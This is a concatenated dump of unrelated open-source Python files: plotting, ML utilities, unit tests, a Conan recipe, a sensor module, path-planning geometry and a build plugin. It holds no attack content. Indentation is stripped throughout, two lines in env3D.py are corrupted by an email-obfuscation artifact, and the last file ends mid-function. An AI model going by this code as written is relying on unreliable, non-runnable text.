The ``ax`` parameter specifies the axes on which the plot will be drawn (None means current axes).
The ``subset_label_formatter`` parameter is a function that can be passed to format the labels
that describe the size of each subset.
>>> from matplotlib_venn import *
>>> v = venn2(subsets={'10': 1, '01': 1, '11': 1}, set_labels = ('A', 'B'))
>>> c = venn2_circles(subsets=(1, 1, 1), linestyle='dashed')
>>> v.get_patch_by_id('10').set_alpha(1.0)
>>> v.get_patch_by_id('10').set_color('white')
>>> v.get_label_by_id('10').set_text('Unknown')
>>> v.get_label_by_id('A').set_text('Set A')
You can provide sets themselves rather than subset sizes:
>>> v = venn2(subsets=[set([1,2]), set([2,3,4,5])], set_labels = ('A', 'B'))
>>> c = venn2_circles(subsets=[set([1,2]), set([2,3,4,5])], linestyle='dashed')
>>> print("%0.2f" % (v.get_circle_radius(1)/v.get_circle_radius(0)))
1.41
'''
if isinstance(subsets, dict):
subsets = [subsets.get(t, 0) for t in ['10', '01', '11']]
elif len(subsets) == 2:
subsets = compute_venn2_subsets(*subsets)
if subset_label_formatter is None:
subset_label_formatter = str
areas = compute_venn2_areas(subsets, normalize_to)
centers, radii = solve_venn2_circles(areas)
regions = compute_venn2_regions(centers, radii)
colors = compute_venn2_colors(set_colors)
if ax is None:
ax = gca()
prepare_venn_axes(ax, centers, radii)
# Create and add patches and subset labels
patches = [r.make_patch() for r in regions]
for (p, c) in zip(patches, colors):
if p is not None:
p.set_facecolor(c)
p.set_edgecolor('none')
p.set_alpha(alpha)
ax.add_patch(p)
label_positions = [r.label_position() for r in regions]
subset_labels = [ax.text(lbl[0], lbl[1], subset_label_formatter(s), va='center', ha='center') if lbl is not None else None for (lbl, s) in zip(label_positions, subsets)]
# Position set labels
if set_labels is not None:
padding = np.mean([r * 0.1 for r in radii])
label_positions = [centers[0] + np.array([0.0, - radii[0] - padding]),
centers[1] + np.array([0.0, - radii[1] - padding])]
labels = [ax.text(pos[0], pos[1], txt, size='large', ha='right', va='top') for (pos, txt) in zip(label_positions, set_labels)]
labels[1].set_ha('left')
else:
labels = None
return VennDiagram(patches, subset_labels, labels, centers, radii)
|
notebooks/bqml/track_meta.py | roannav/learntools | 359 | 32140 | # See also examples/example_track/track_meta.py for a longer, commented example
track = dict(
author_username='dansbecker',
course_name='Machine Learning',
course_url='https://www.kaggle.com/learn/intro-to-machine-learning'
)
lessons = [
dict(
topic='Your First BiqQuery ML Model',
),
]
notebooks = [
dict(
filename='tut1.ipynb',
lesson_idx=0,
type='tutorial',
scriptid=4076893,
),
dict(
filename='ex1.ipynb',
lesson_idx=0,
type='exercise',
scriptid=4077160,
),
]
|
Python/1013. PartitionArrayIntoThreePartsWithEqualSum.py | nizD/LeetCode-Solutions | 263 | 32142 | class Solution:
def canThreePartsEqualSum(self, A: List[int]) -> bool:
# Since all the three parts are equal, if we sum all element of arrary it should be a multiplication of 3
# so the sum of each part must be equal to sum of all element divided by 3
quotient, remainder = divmod(sum(A), 3)
if remainder != 0:
return False
subarray = 0
partitions = 0
for num in A:
subarray += num
if subarray == quotient:
partitions += 1
subarray = 0
# Check if it consist at least 3 partitions
return partitions >= 3 |
lib/data_utils/insta_utils_imgs.py | ziniuwan/maed | 145 | 32144 | import os
import sys
sys.path.append('.')
import argparse
import numpy as np
import os.path as osp
from multiprocessing import Process, Pool
from glob import glob
from tqdm import tqdm
import tensorflow as tf
from PIL import Image
from lib.core.config import INSTA_DIR, INSTA_IMG_DIR
def process_single_record(fname, outdir, split):
sess = tf.Session()
#print(fname)
record_name = fname.split('/')[-1]
for vid_idx, serialized_ex in enumerate(tf.python_io.tf_record_iterator(fname)):
#print(vid_idx)
os.makedirs(osp.join(outdir, split, record_name, str(vid_idx)), exist_ok=True)
example = tf.train.Example()
example.ParseFromString(serialized_ex)
N = int(example.features.feature['meta/N'].int64_list.value[0])
images_data = example.features.feature[
'image/encoded'].bytes_list.value
for i in range(N):
image = np.expand_dims(sess.run(tf.image.decode_jpeg(images_data[i], channels=3)), axis=0)
#video.append(image)
image = Image.fromarray(np.squeeze(image, axis=0))
image.save(osp.join(outdir, split, record_name, str(vid_idx), str(i)+".jpg"))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--inp_dir', type=str, help='tfrecords file path', default=INSTA_DIR)
parser.add_argument('--n', type=int, help='total num of workers')
parser.add_argument('--i', type=int, help='current index of worker (from 0 to n-1)')
parser.add_argument('--split', type=str, help='train or test')
parser.add_argument('--out_dir', type=str, help='output images path', default=INSTA_IMG_DIR)
args = parser.parse_args()
fpaths = glob(f'{args.inp_dir}/{args.split}/*.tfrecord')
fpaths = sorted(fpaths)
total = len(fpaths)
fpaths = fpaths[args.i*total//args.n : (args.i+1)*total//args.n]
#print(fpaths)
#print(len(fpaths))
os.makedirs(args.out_dir, exist_ok=True)
for idx, fp in enumerate(fpaths):
process_single_record(fp, args.out_dir, args.split) |
recipes/happly/all/conanfile.py | rockandsalt/conan-center-index | 562 | 32192 | from conans import ConanFile, tools
class HapplyConan(ConanFile):
name = "happly"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/nmwsharp/happly"
topics = ("conan", "happly", "ply", "3D")
license = "MIT"
description = "A C++ header-only parser for the PLY file format. Parse .ply happily!"
settings = "compiler"
no_copy_source = True
@property
def _source_subfolder(self):
return "source_subfolder"
def validate(self):
if self.settings.compiler.cppstd:
tools.check_min_cppstd(self, 11)
def source(self):
tools.get(**self.conan_data["sources"][self.version], destination=self._source_subfolder, strip_root=True)
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses")
self.copy("happly.h", src=self._source_subfolder, dst="include")
def package_id(self):
self.info.header_only()
|
tests/integration/serialization_test.py | markowanga/stweet | 101 | 32206 | import pytest
import stweet as st
from tests.test_util import get_temp_test_file_name, get_tweets_to_tweet_output_test, \
two_lists_assert_equal
def test_csv_serialization():
csv_filename = get_temp_test_file_name('csv')
tweets_collector = st.CollectorTweetOutput()
get_tweets_to_tweet_output_test([
st.CsvTweetOutput(csv_filename),
tweets_collector
])
tweets_from_csv = st.read_tweets_from_csv_file(csv_filename)
two_lists_assert_equal(tweets_from_csv, tweets_collector.get_raw_list())
def test_file_json_lines_serialization():
jl_filename = get_temp_test_file_name('jl')
tweets_collector = st.CollectorTweetOutput()
get_tweets_to_tweet_output_test([
st.JsonLineFileTweetOutput(jl_filename),
tweets_collector
])
tweets_from_jl = st.read_tweets_from_json_lines_file(jl_filename)
two_lists_assert_equal(tweets_from_jl, tweets_collector.get_raw_list())
|
Maths_And_Stats/Number_Theory/Segmented_Sieve/segmented_sieve.py | arslantalib3/algo_ds_101 | 182 | 32208 | <gh_stars>100-1000
def segmented_sieve(n):
# Create an boolean array with all values True
primes = [True]*n
for p in range(2,n):
#If prime[p] is True,it is a prime and its multiples are not prime
if primes[p]:
for i in range(2*p,n,p):
# Mark every multiple of a prime as not prime
primes[i]=False
#If value is true it is prime and print value
for l in range(2,n):
if primes[l]:
print(f"{l} ")
#Test
while True:
try:
input_value = int(input("Please a number: "))
segmented_sieve(input_value)
break
except ValueError:
print("No valid integer! Please try again ...") |
third_party/blink/renderer/bindings/scripts/blink_idl_parser_test.py | zealoussnow/chromium | 14,668 | 32213 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=no-member,relative-import
"""Unit tests for blink_idl_parser.py."""
import unittest
from blink_idl_parser import BlinkIDLParser
class BlinkIDLParserTest(unittest.TestCase):
def test_missing_semicolon_between_definitions(self):
# No semicolon after enum definition.
text = '''enum TestEnum { "value" } dictionary TestDictionary {};'''
parser = BlinkIDLParser()
parser.ParseText(filename='', data=text)
self.assertGreater(parser.GetErrors(), 0)
|
sarikasama/0012/0012.py | saurabh896/python-1 | 3,976 | 32229 | #!/usr/bin/env python3
#filter sensitive words in user's input
def replace_sensitive_words(input_word):
s_words = []
with open('filtered_words','r') as f:
line = f.readline()
while line != '':
s_words.append(line.strip())
line = f.readline()
for word in s_words:
if word in input_word:
input_word = input_word.replace(word, "**")
print(input_word)
if __name__ == '__main__':
while True:
input_word = input('--> ')
replace_sensitive_words(input_word)
|
tests/r/test_bcdeter.py | hajime9652/observations | 199 | 32245 | <reponame>hajime9652/observations
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bcdeter import bcdeter
def test_bcdeter():
"""Test module bcdeter.py by downloading
bcdeter.csv and testing shape of
extracted data has 95 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = bcdeter(test_path)
try:
assert x_train.shape == (95, 3)
except:
shutil.rmtree(test_path)
raise()
|
Sampling_based_Planning/rrt_3D/env3D.py | CodesHub/PathPlanning | 3,693 | 32258 | <filename>Sampling_based_Planning/rrt_3D/env3D.py
# this is the three dimensional configuration space for rrt
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
import numpy as np
# from utils3D import OBB2AABB
def R_matrix(z_angle,y_angle,x_angle):
# s angle: row; y angle: pitch; z angle: yaw
# generate rotation matrix in SO3
# RzRyRx = R, ZYX intrinsic rotation
# also (r1,r2,r3) in R3*3 in {W} frame
# used in obb.O
# [[R p]
# [0T 1]] gives transformation from body to world
return np.array([[np.cos(z_angle), -np.sin(z_angle), 0.0], [np.sin(z_angle), np.cos(z_angle), 0.0], [0.0, 0.0, 1.0]])@ \
np.array([[np.cos(y_angle), 0.0, np.sin(y_angle)], [0.0, 1.0, 0.0], [-np.sin(y_angle), 0.0, np.cos(y_angle)]])@ \
np.array([[1.0, 0.0, 0.0], [0.0, np.cos(x_angle), -np.sin(x_angle)], [0.0, np.sin(x_angle), np.cos(x_angle)]])
def getblocks():
# AABBs
block = [[4.00e+00, 1.20e+01, 0.00e+00, 5.00e+00, 2.00e+01, 5.00e+00],
[5.5e+00, 1.20e+01, 0.00e+00, 1.00e+01, 1.30e+01, 5.00e+00],
[1.00e+01, 1.20e+01, 0.00e+00, 1.40e+01, 1.30e+01, 5.00e+00],
[1.00e+01, 9.00e+00, 0.00e+00, 2.00e+01, 1.00e+01, 5.00e+00],
[9.00e+00, 6.00e+00, 0.00e+00, 1.00e+01, 1.00e+01, 5.00e+00]]
Obstacles = []
for i in block:
i = np.array(i)
Obstacles.append([j for j in i])
return np.array(Obstacles)
def getballs():
spheres = [[2.0,6.0,2.5,1.0],[14.0,14.0,2.5,2]]
Obstacles = []
for i in spheres:
Obstacles.append([j for j in i])
return np.array(Obstacles)
def getAABB(blocks):
# used for Pyrr package for detecting collision
AABB = []
for i in blocks:
AABB.append(np.array([np.add(i[0:3], -0), np.add(i[3:6], 0)])) # make AABBs alittle bit of larger
return AABB
def getAABB2(blocks):
# used in lineAABB
AABB = []
for i in blocks:
AABB.append(aabb(i))
return AABB
def add_block(block = [1.51e+01, 0.00e+00, 2.10e+00, 1.59e+01, 5.00e+00, 6.00e+00]):
return block
class aabb(object):
# make AABB out of blocks,
# P: center point
# E: extents
# O: Rotation matrix in SO(3), in {w}
def __init__(self,AABB):
self.P = [(AABB[3] + AABB[0])/2, (AABB[4] + AABB[1])/2, (AABB[5] + AABB[2])/2]# center point
self.E = [(AABB[3] - AABB[0])/2, (AABB[4] - AABB[1])/2, (AABB[5] - AABB[2])/2]# extents
self.O = [[1,0,0],[0,1,0],[0,0,1]]
class obb(object):
# P: center point
# E: extents
# O: Rotation matrix in SO(3), in {w}
def __init__(self, P, E, O):
self.P = P
self.E = E
self.O = O
self.T = np.vstack([np.column_stack([self.O.T,[email protected]]),[0,0,0,1]])
class env():
def __init__(self, xmin=0, ymin=0, zmin=0, xmax=20, ymax=20, zmax=5, resolution=1):
# def __init__(self, xmin=-5, ymin=0, zmin=-5, xmax=10, ymax=5, zmax=10, resolution=1):
self.resolution = resolution
self.boundary = np.array([xmin, ymin, zmin, xmax, ymax, zmax])
self.blocks = getblocks()
self.AABB = getAABB2(self.blocks)
self.AABB_pyrr = getAABB(self.blocks)
self.balls = getballs()
self.OBB = np.array([obb([5.0,7.0,2.5],[0.5,2.0,2.5],R_matrix(135,0,0)),
obb([12.0,4.0,2.5],[0.5,2.0,2.5],R_matrix(45,0,0))])
self.start = np.array([2.0, 2.0, 2.0])
self.goal = np.array([6.0, 16.0, 0.0])
self.t = 0 # time
def New_block(self):
newblock = add_block()
self.blocks = np.vstack([self.blocks,newblock])
self.AABB = getAABB2(self.blocks)
self.AABB_pyrr = getAABB(self.blocks)
def move_start(self, x):
self.start = x
def move_block(self, a = [0,0,0], s = 0, v = [0.1,0,0], block_to_move = 0, mode = 'translation'):
# t is time , v is velocity in R3, a is acceleration in R3, s is increment ini time,
# R is an orthorgonal transform in R3*3, is the rotation matrix
# (s',t') = (s + tv, t) is uniform transformation
# (s',t') = (s + a, t + s) is a translation
if mode == 'translation':
ori = np.array(self.blocks[block_to_move])
self.blocks[block_to_move] = \
np.array([ori[0] + a[0],\
ori[1] + a[1],\
ori[2] + a[2],\
ori[3] + a[0],\
ori[4] + a[1],\
ori[5] + a[2]])
self.AABB[block_to_move].P = \
[self.AABB[block_to_move].P[0] + a[0], \
self.AABB[block_to_move].P[1] + a[1], \
self.AABB[block_to_move].P[2] + a[2]]
self.t += s
# return a range of block that the block might moved
a = self.blocks[block_to_move]
return np.array([a[0] - self.resolution, a[1] - self.resolution, a[2] - self.resolution, \
a[3] + self.resolution, a[4] + self.resolution, a[5] + self.resolution]), \
np.array([ori[0] - self.resolution, ori[1] - self.resolution, ori[2] - self.resolution, \
ori[3] + self.resolution, ori[4] + self.resolution, ori[5] + self.resolution])
# return a,ori
# (s',t') = (Rx, t)
def move_OBB(self, obb_to_move = 0, theta=[0,0,0], translation=[0,0,0]):
# theta stands for rotational angles around three principle axis in world frame
# translation stands for translation in the world frame
ori = [self.OBB[obb_to_move]]
# move obb position
self.OBB[obb_to_move].P = \
[self.OBB[obb_to_move].P[0] + translation[0],
self.OBB[obb_to_move].P[1] + translation[1],
self.OBB[obb_to_move].P[2] + translation[2]]
# Calculate orientation
self.OBB[obb_to_move].O = R_matrix(z_angle=theta[0],y_angle=theta[1],x_angle=theta[2])
# generating transformation matrix
self.OBB[obb_to_move].T = np.vstack([np.column_stack([self.OBB[obb_to_move].O.T,\
-self.OBB[obb_to_move][email protected][obb_to_move].P]),[translation[0],translation[1],translation[2],1]])
return self.OBB[obb_to_move], ori[0]
if __name__ == '__main__':
newenv = env()
|
mqtt_io/modules/sensor/mcp3008.py | DominicWindisch/mqtt-io | 231 | 32261 | <reponame>DominicWindisch/mqtt-io<filename>mqtt_io/modules/sensor/mcp3008.py
"""
MCP3008 analog to digital converter
"""
import logging
from typing import cast
from mqtt_io.types import ConfigType, SensorValueType
from . import GenericSensor
REQUIREMENTS = ("adafruit-mcp3008",)
CONFIG_SCHEMA = {
"spi_port": dict(type="integer", required=False, empty=False, default=0),
"spi_device": dict(type="integer", required=False, empty=False, default=0),
"chip_addr": dict(type="integer", required=False, empty=False, default=0),
}
_LOG = logging.getLogger(__name__)
class Sensor(GenericSensor):
"""
Implementation of MCP3008 ADC sensor.
"""
SENSOR_SCHEMA = {
"channel": dict(
type="integer",
required=True,
min=0,
max=7,
)
}
def setup_module(self) -> None:
"""
Init the mcp on SPI CE0
"""
# pylint: disable=import-outside-toplevel,import-error
import Adafruit_GPIO.SPI as SPI # type: ignore
import Adafruit_MCP3008 # type: ignore
self.mcp = Adafruit_MCP3008.MCP3008(
spi=SPI.SpiDev(self.config["spi_port"], self.config["spi_device"])
)
def get_value(self, sens_conf: ConfigType) -> SensorValueType:
"""
Get the analog value from the adc for the configured channel
"""
# Returns an integer from 0-1023
return cast(int, self.mcp.read_adc(sens_conf["channel"]))
|
tests/test_scriptfields.py | ttimasdf/pyes | 175 | 32283 | <filename>tests/test_scriptfields.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from pyes import scriptfields
class ScriptFieldsTest(unittest.TestCase):
def test_scriptfieldserror_imported(self):
self.assertTrue(hasattr(scriptfields, 'ScriptFieldsError'))
def test_ignore_failure(self):
fields = scriptfields.ScriptFields("a_field", "return _source.field", ignore_failure=True)
serialized = fields.serialize()
self.assertIn("ignore_failure", serialized.get("a_field", {}))
if __name__ == '__main__':
unittest.main()
|
arviz/plots/backends/matplotlib/distcomparisonplot.py | sudojarvis/arviz | 1,159 | 32296 | <filename>arviz/plots/backends/matplotlib/distcomparisonplot.py
"""Matplotlib Density Comparison plot."""
import matplotlib.pyplot as plt
import numpy as np
from ...distplot import plot_dist
from ...plot_utils import _scale_fig_size
from . import backend_kwarg_defaults, backend_show
def plot_dist_comparison(
ax,
nvars,
ngroups,
figsize,
dc_plotters,
legend,
groups,
textsize,
labeller,
prior_kwargs,
posterior_kwargs,
observed_kwargs,
backend_kwargs,
show,
):
"""Matplotlib Density Comparison plot."""
if backend_kwargs is None:
backend_kwargs = {}
backend_kwargs = {
**backend_kwarg_defaults(),
**backend_kwargs,
}
if prior_kwargs is None:
prior_kwargs = {}
if posterior_kwargs is None:
posterior_kwargs = {}
if observed_kwargs is None:
observed_kwargs = {}
if backend_kwargs is None:
backend_kwargs = {}
(figsize, _, _, _, linewidth, _) = _scale_fig_size(figsize, textsize, 2 * nvars, ngroups)
backend_kwargs.setdefault("figsize", figsize)
posterior_kwargs.setdefault("plot_kwargs", {})
posterior_kwargs["plot_kwargs"]["color"] = posterior_kwargs["plot_kwargs"].get("color", "C0")
posterior_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
posterior_kwargs.setdefault("hist_kwargs", {})
posterior_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
prior_kwargs.setdefault("plot_kwargs", {})
prior_kwargs["plot_kwargs"]["color"] = prior_kwargs["plot_kwargs"].get("color", "C1")
prior_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
prior_kwargs.setdefault("hist_kwargs", {})
prior_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
observed_kwargs.setdefault("plot_kwargs", {})
observed_kwargs["plot_kwargs"]["color"] = observed_kwargs["plot_kwargs"].get("color", "C2")
observed_kwargs["plot_kwargs"].setdefault("linewidth", linewidth)
observed_kwargs.setdefault("hist_kwargs", {})
observed_kwargs["hist_kwargs"].setdefault("alpha", 0.5)
if ax is None:
axes = np.empty((nvars, ngroups + 1), dtype=object)
fig = plt.figure(**backend_kwargs)
gs = fig.add_gridspec(ncols=ngroups, nrows=nvars * 2)
for i in range(nvars):
for j in range(ngroups):
axes[i, j] = fig.add_subplot(gs[2 * i, j])
axes[i, -1] = fig.add_subplot(gs[2 * i + 1, :])
else:
axes = ax
if ax.shape != (nvars, ngroups + 1):
raise ValueError(
"Found {} shape of axes, which is not equal to data shape {}.".format(
axes.shape, (nvars, ngroups + 1)
)
)
for idx, plotter in enumerate(dc_plotters):
group = groups[idx]
kwargs = (
prior_kwargs
if group.startswith("prior")
else posterior_kwargs
if group.startswith("posterior")
else observed_kwargs
)
for idx2, (
var_name,
sel,
isel,
data,
) in enumerate(plotter):
label = f"{group}"
plot_dist(
data,
label=label if legend else None,
ax=axes[idx2, idx],
**kwargs,
)
plot_dist(
data,
label=label if legend else None,
ax=axes[idx2, -1],
**kwargs,
)
if idx == 0:
axes[idx2, -1].set_xlabel(labeller.make_label_vert(var_name, sel, isel))
if backend_show(show):
plt.show()
return axes
|
tests/r/test_us_pop.py | hajime9652/observations | 199 | 32343 | <gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.us_pop import us_pop
def test_us_pop():
"""Test module us_pop.py by downloading
us_pop.csv and testing shape of
extracted data has 22 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = us_pop(test_path)
try:
assert x_train.shape == (22, 2)
except:
shutil.rmtree(test_path)
raise()
|
run.py | radish2012/flask-restful-example | 650 | 32370 | from app.factory import create_app, celery_app
app = create_app(config_name="DEVELOPMENT")
app.app_context().push()
if __name__ == "__main__":
app.run()
|
tests/unicode/unicode_id.py | learnforpractice/micropython-cpp | 692 | 32394 | <filename>tests/unicode/unicode_id.py
# test unicode in identifiers
# comment
# αβγδϵφζ
# global identifiers
α = 1
αβγ = 2
bβ = 3
βb = 4
print(α, αβγ, bβ, βb)
# function, argument, local identifiers
def α(β, γ):
δ = β + γ
print(β, γ, δ)
α(1, 2)
# class, method identifiers
class φ:
def __init__(self):
pass
def δ(self, ϵ):
print(ϵ)
zζzζz = φ()
if hasattr(zζzζz, "δ"):
zζzζz.δ(ϵ=123)
|
samples/histrequester_demo.py | suuuch/tws_async | 102 | 32397 | import datetime
import pytz
from tws_async import *
stocks = [
Stock('TSLA'),
Stock('AAPL'),
Stock('GOOG'),
Stock('INTC', primaryExchange='NASDAQ')
]
forexs = [
Forex('EURUSD'),
Forex('GBPUSD'),
Forex('USDJPY')
]
endDate = datetime.date.today()
startDate = endDate - datetime.timedelta(days=7)
histReqs = []
for date in util.dateRange(startDate, endDate):
histReqs += [HistRequest(stock, date) for stock in stocks]
histReqs += [HistRequest(forex, date, whatToShow='MIDPOINT',
durationStr='30 D', barSizeSetting='1 day') for forex in forexs]
timezone = datetime.timezone.utc
# timezone = pytz.timezone('Europe/Amsterdam')
# timezone = pytz.timezone('US/Eastern')
util.logToConsole()
tws = HistRequester()
tws.connect('127.0.0.1', 7497, clientId=1)
task = tws.download(histReqs, rootDir='data', timezone=timezone)
tws.run(task)
|
Tests/ttLib/tables/C_F_F__2_test.py | odidev/fonttools | 2,705 | 32399 | """cff2Lib_test.py -- unit test for Adobe CFF fonts."""
from fontTools.ttLib import TTFont
from io import StringIO
import re
import os
import unittest
CURR_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
DATA_DIR = os.path.join(CURR_DIR, 'data')
CFF_TTX = os.path.join(DATA_DIR, "C_F_F__2.ttx")
CFF_BIN = os.path.join(DATA_DIR, "C_F_F__2.bin")
def strip_VariableItems(string):
# ttlib changes with the fontTools version
string = re.sub(' ttLibVersion=".*"', '', string)
# head table checksum and mod date changes with each save.
string = re.sub('<checkSumAdjustment value="[^"]+"/>', '', string)
string = re.sub('<modified value="[^"]+"/>', '', string)
return string
class CFFTableTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open(CFF_BIN, 'rb') as f:
font = TTFont(file=CFF_BIN)
cffTable = font['CFF2']
cls.cff2Data = cffTable.compile(font)
with open(CFF_TTX, 'r') as f:
cff2XML = f.read()
cff2XML = strip_VariableItems(cff2XML)
cls.cff2XML = cff2XML.splitlines()
def test_toXML(self):
font = TTFont(file=CFF_BIN)
cffTable = font['CFF2']
cffData = cffTable.compile(font)
out = StringIO()
font.saveXML(out)
cff2XML = out.getvalue()
cff2XML = strip_VariableItems(cff2XML)
cff2XML = cff2XML.splitlines()
self.assertEqual(cff2XML, self.cff2XML)
def test_fromXML(self):
font = TTFont(sfntVersion='OTTO')
font.importXML(CFF_TTX)
cffTable = font['CFF2']
cff2Data = cffTable.compile(font)
self.assertEqual(cff2Data, self.cff2Data)
if __name__ == "__main__":
unittest.main()
|
tfumap/parametric_tsne.py | EhsanKA/ParametricUMAP_paper | 124 | 32415 | ### based on https://github.com/kylemcdonald/Parametric-t-SNE/blob/master/Parametric%20t-SNE%20(Keras).ipynb
import numpy as np
from tensorflow.keras import backend as K
from tensorflow.keras.losses import categorical_crossentropy
from tqdm.autonotebook import tqdm
import tensorflow as tf
def Hbeta(D, beta):
"""Computes the Gaussian kernel values given a vector of
squared Euclidean distances, and the precision of the Gaussian kernel.
The function also computes the perplexity (P) of the distribution."""
P = np.exp(-D * beta)
sumP = np.sum(P)
H = np.log(sumP) + beta * np.sum(np.multiply(D, P)) / sumP
P = P / sumP
return H, P
def x2p(X, u=15, tol=1e-4, print_iter=500, max_tries=50, verbose=0):
"""
% X2P Identifies appropriate sigma's to get kk NNs up to some tolerance
%
% [P, beta] = x2p(xx, kk, tol)
%
% Identifies the required precision (= 1 / variance^2) to obtain a Gaussian
% kernel with a certain uncertainty for every datapoint. The desired
% uncertainty can be specified through the perplexity u (default = 15). The
% desired perplexity is obtained up to some tolerance that can be specified
% by tol (default = 1e-4).
% The function returns the final Gaussian kernel in P, as well as the
% employed precisions per instance in beta.
%
"""
# Initialize some variables
n = X.shape[0] # number of instances
P = np.zeros((n, n)) # empty probability matrix
beta = np.ones(n) # empty precision vector
logU = np.log(u) # log of perplexity (= entropy)
# Compute pairwise distances
if verbose > 0:
print("Computing pairwise distances...")
sum_X = np.sum(np.square(X), axis=1)
# note: translating sum_X' from matlab to numpy means using reshape to add a dimension
D = sum_X + sum_X[:, None] + -2 * X.dot(X.T)
# Run over all datapoints
if verbose > 0:
print("Computing P-values...")
for i in range(n):
if verbose > 1 and print_iter and i % print_iter == 0:
print("Computed P-values {} of {} datapoints...".format(i, n))
# Set minimum and maximum values for precision
betamin = float("-inf")
betamax = float("+inf")
# Compute the Gaussian kernel and entropy for the current precision
indices = np.concatenate((np.arange(0, i), np.arange(i + 1, n)))
Di = D[i, indices]
H, thisP = Hbeta(Di, beta[i])
# Evaluate whether the perplexity is within tolerance
Hdiff = H - logU
tries = 0
while abs(Hdiff) > tol and tries < max_tries:
# If not, increase or decrease precision
if Hdiff > 0:
betamin = beta[i]
if np.isinf(betamax):
beta[i] *= 2
else:
beta[i] = (beta[i] + betamax) / 2
else:
betamax = beta[i]
if np.isinf(betamin):
beta[i] /= 2
else:
beta[i] = (beta[i] + betamin) / 2
# Recompute the values
H, thisP = Hbeta(Di, beta[i])
Hdiff = H - logU
tries += 1
# Set the final row of P
P[i, indices] = thisP
if verbose > 0:
print("Mean value of sigma: {}".format(np.mean(np.sqrt(1 / beta))))
print("Minimum value of sigma: {}".format(np.min(np.sqrt(1 / beta))))
print("Maximum value of sigma: {}".format(np.max(np.sqrt(1 / beta))))
return P, beta
def compute_joint_probabilities(
samples, batch_size=5000, d=2, perplexity=30, tol=1e-5, verbose=0
):
""" This function computes the probababilities in X, split up into batches
% Gaussians employed in the high-dimensional space have the specified
% perplexity (default = 30). The number of degrees of freedom of the
% Student-t distribution may be specified through v (default = d - 1).
"""
v = d - 1
# Initialize some variables
n = samples.shape[0]
batch_size = min(batch_size, n)
# Precompute joint probabilities for all batches
if verbose > 0:
print("Precomputing P-values...")
batch_count = int(n / batch_size)
P = np.zeros((batch_count, batch_size, batch_size))
# for each batch of data
for i, start in enumerate(tqdm(range(0, n - batch_size + 1, batch_size))):
# select batch
curX = samples[start : start + batch_size]
# compute affinities using fixed perplexity
P[i], _ = x2p(curX, perplexity, tol, verbose=verbose)
# make sure we don't have NaN's
P[i][np.isnan(P[i])] = 0
# make symmetric
P[i] = P[i] + P[i].T # / 2
# obtain estimation of joint probabilities
P[i] = P[i] / P[i].sum()
P[i] = np.maximum(P[i], np.finfo(P[i].dtype).eps)
return P
def z2p(z, d, n, eps=10e-15):
""" Computes the low dimensional probability
"""
v = d - 1
sum_act = tf.math.reduce_sum(tf.math.square(z), axis=1)
Q = K.reshape(sum_act, [-1, 1]) + -2 * tf.keras.backend.dot(z, tf.transpose(z))
Q = (sum_act + Q) / v
Q = tf.math.pow(1 + Q, -(v + 1) / 2)
Q *= 1 - np.eye(n)
Q /= tf.math.reduce_sum(Q)
Q = tf.math.maximum(Q, eps)
return Q
def tsne_loss(d, batch_size, eps=10e-15):
# v = d - 1.0
def loss(P, Z):
""" KL divergence
P is the joint probabilities for this batch (Keras loss functions call this y_true)
Z is the low-dimensional output (Keras loss functions call this y_pred)
"""
Q = z2p(Z, d, n=batch_size, eps=eps)
return tf.math.reduce_sum(P * tf.math.log((P + eps) / (Q + eps)))
return loss
|
atomic_reactor/plugins/check_and_set_platforms.py | qixiang/atomic-reactor | 113 | 32438 | <filename>atomic_reactor/plugins/check_and_set_platforms.py
"""
Copyright (c) 2018 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Query the koji build target, if any, to find the enabled architectures. Remove any excluded
architectures, and return the resulting list.
"""
from typing import List, Optional
from atomic_reactor.plugin import Plugin
from atomic_reactor.util import is_scratch_build, is_isolated_build, map_to_user_params
from atomic_reactor.constants import PLUGIN_CHECK_AND_SET_PLATFORMS_KEY
from atomic_reactor.config import get_koji_session
class CheckAndSetPlatformsPlugin(Plugin):
key = PLUGIN_CHECK_AND_SET_PLATFORMS_KEY
is_allowed_to_fail = False
args_from_user_params = map_to_user_params("koji_target")
def __init__(self, workflow, koji_target=None):
"""
constructor
:param workflow: DockerBuildWorkflow instance
:param koji_target: str, Koji build target name
"""
# call parent constructor
super(CheckAndSetPlatformsPlugin, self).__init__(workflow)
self.koji_target = koji_target
def _limit_platforms(self, platforms: List[str]) -> List[str]:
"""Limit platforms in a specific range by platforms config.
:param platforms: a list of platforms to be filtered.
:type platforms: list[str]
:return: the limited platforms.
:rtype: list[str]
"""
final_platforms = set(platforms)
source_config = self.workflow.source.config
only_platforms = set(source_config.only_platforms)
excluded_platforms = set(source_config.excluded_platforms)
if only_platforms:
if only_platforms == excluded_platforms:
self.log.warning('only and not platforms are the same: %r', only_platforms)
final_platforms &= only_platforms
return list(final_platforms - excluded_platforms)
def run(self) -> Optional[List[str]]:
"""
run the plugin
"""
user_platforms: Optional[List[str]] = self.workflow.user_params.get("platforms")
if self.koji_target:
koji_session = get_koji_session(self.workflow.conf)
self.log.info("Checking koji target for platforms")
event_id = koji_session.getLastEvent()['id']
target_info = koji_session.getBuildTarget(self.koji_target, event=event_id)
build_tag = target_info['build_tag']
koji_build_conf = koji_session.getBuildConfig(build_tag, event=event_id)
koji_platforms = koji_build_conf['arches']
if not koji_platforms:
self.log.info("No platforms found in koji target")
return None
platforms = koji_platforms.split()
self.log.info("Koji platforms are %s", sorted(platforms))
